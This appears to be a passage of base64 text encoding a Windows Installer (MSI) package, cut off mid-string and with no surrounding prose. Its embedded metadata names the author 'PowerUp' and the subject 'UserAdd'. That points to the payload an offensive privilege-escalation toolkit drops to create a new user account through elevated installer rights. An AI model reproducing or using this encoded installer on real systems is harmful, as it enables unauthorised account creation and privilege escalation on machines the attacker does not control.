'0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgAEAP7/DAAGAAAAAAAAAAEAAAABAAAAAQAAAAAAAAAAEAAAAgAAAAEAAAD+////AAAAAAAAAAD///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP3////+/////v///y8AAAAFAAAABgAAAP7///8IAAAACQAAAAoAAAALAAAADAAAAA0AAAAOAAAADwAAABAAAAARAAAAEgAAABMAAAAUAAAAFQAAACwAAAAYAAAAFgAAABkAAAAaAAAAGwAAABwAAAAdAAAAHgAAAB8AAAAgAAAAIQAAACIAAAAjAAAAJAAAACUAAAAmAAAAJwAAACgAAAApAAAAKgAAACsAAAD+////LQAAAC4AAAAwAAAA/v///zEAAAD+//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////9SAG8AbwB0ACAARQBuAHQAcgB5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFgAFAP//////////AgAAAIQQDAAAAAAAwAAAAAAAAEYAAAAAAAAAAAAAAABQSJaT62LPAQMAAABAFwAAAAAAAAUAUwB1AG0AbQBhAHIAeQBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoAAIBEAAAABkAAAD/////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANgBAAAAAAAAQEj/P+RD7EHkRaxEMUgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAgEVAAAAAwAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJAAAAEAgAAAAAAABASMpBMEOxOztCJkY3QhxCNEZoRCZCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAACAQQAAAABAAAA/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACoAAAAwAAAAAAAAAEBIykEwQ7E/Ej8oRThCsUEoSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAIBEgAAAA0AAAD/////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKwAAABgAAAAAAAAAQEjKQflFzkaoQfhFKD8oRThCsUEoSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgAAgH///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAAAAKgAAAAAAAABASAtDMUE1RwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAP///////////////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////////////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP///////////////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////////////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAIAAAADAAAABAAAAAUAAAAGAAAABwAAAP7/////////CgAAAAsAAAAMAAAADQAAAA4AAAAPAAAAEAAAABEAAAASAAAAEwAAABQAAAAVAAAAFgAAABcAAAAYAAAAGQAAABoAAAAbAAAAHAAAAB0AAAAeAAAAHwAAACAAAAAhAAAAIgAAACMAAAAkAAAAJQAAACYAAAAnAAAAKAAAACkAAAD+/////v////7////+////MwAAAP7////+/////v////7////+////OgAAADUAAAA2AAAA/v////7////+/////v///zsAAAA9AAAA/v///z4AAAA/AAAAQAAAAEEAAABCAAAAQwAAAEQAAABFAAAARgAAAEcAAABIAAAASQAAAEoAAAD+////TAAAAE0AAABOAAAATwAAAFAAAABRAAAAUgAAAFMAAABUAAAAVQAAAP7////+////WAAAAP7////+/////v///1wAAAD+//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////7/AAAGAQIAAAAAAAAAAAAAAAAAAAAAAAEAAADghZ/y+U9oEKuRCAArJ7PZMAAAAKgBAAAOAAAAAQAAAHgAAAACAAAAkAEAAAMAAACAAQAABAAAAHABAAAFAAAAgAAAAAYAAAAoAQAABwAAAJQAAAAJAAAAqAAAAAwAAADYAAAADQAAAOQAAAAOAAAA8AAAAA8AAAD4AAAAEgAAAAgBAAATAAAAAAEAAAIAAADkBAAAHgAAAAoAAABJbnN0YWxsZXIAAAAeAAAACwAAAEludGVsOzEwMzMAAB4AAAAnAAAAe0EwNDlFMzFGLTc3MDEtNEM0QS1BQ0JDLUIyNjBFQjA4QkI0Q30AAEAAAAAALfR1QTjPAUAAAAAALfR1QTjPAQMAAADIAAAAAwAAAAIAAAADAAAAAgAAAB4AAAAXAAAATVNJIFdyYXBwZXIgKDQuMS41NC4wKQAAHgAAAEAAAABJbnN0YWxsZXIgd3JhcHBlZCBieSBNU0kgV3JhcHBlciAoNC4xLjU0LjApIGZyb20gd3d3LmV4ZW1zaS5jb20AHgAAAAgAAABQb3dlclVwAB4AAAAIAAAAVXNlckFkZAAeAAAAEAAAAFVzZXJBZGQgMS4wLjAuMABBOM8BAwAAAMgAAAADAAAAAgAAAB4AAAArAAAAV2luZG93cyBJbnN0YWxsZXIgWE1MIFRvb2xzZXQgKDMuOC4xMTI4LjApAAADAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYABgAGAAYABgAGAAYABgAGAAYACgAKACIAIgAiACkAKQApACoAKgAqACsAKwAvAC8ALwAvAC8ALwA1ADUANQA9AD0APQA9AD0ATQBNAE0ATQBNAE0ATQBNAFwAXABhAGEAYQBhAGEAYQBhAGEAbwBvAHIAcgByAHMAcwBzAHQAdAB3AHcAdwB3AHcAdwCCAIIAhgCGAIYAhgCGAIYAkACQAJAAkACQAJAAkAACAAUACwAMAA0ADgAPABAAEQASAAcACQAjACUAJwAjACUAJwAjACUAJwABAC0AJQAvADEANAA3ADoANQBJAEsABAAjAEAAQwBGAAsANAA3AE0ATwBRAFQAVgBdAF8AJwA3AF8AYQBkAGcAaQBrAAEALQAjACUAJwAjACUAJwALACUAQAB4AHoAfAB+AIAABwCCAAEABwBfAIYAiACKADcAawCRAJMAlQCZAJsACAAIABgAGAAYABgAGAAIABgAGAAIAAgACAAYABgACAAYABgACAAYABgACAAIABgACAAYAAgACAAYAAgAGAAIAAgACAAYABgAGAAYABgACAAIABgAGAAYAAgACAAIAAgAGAAIAAgACAAIABgAGAAIAAgACAAYABgACAAYABgACAAIABgACAAIABgAGAAYAAgACAAYABgACAAIAAgACAAIABgACAAYABgAGAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAgAEAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA/P//fwAAAAAAAAAA/P//fwAAAAAAAAAA/P//fwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAgAAAAAAAAAAAAQAAgAAAAIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/P//f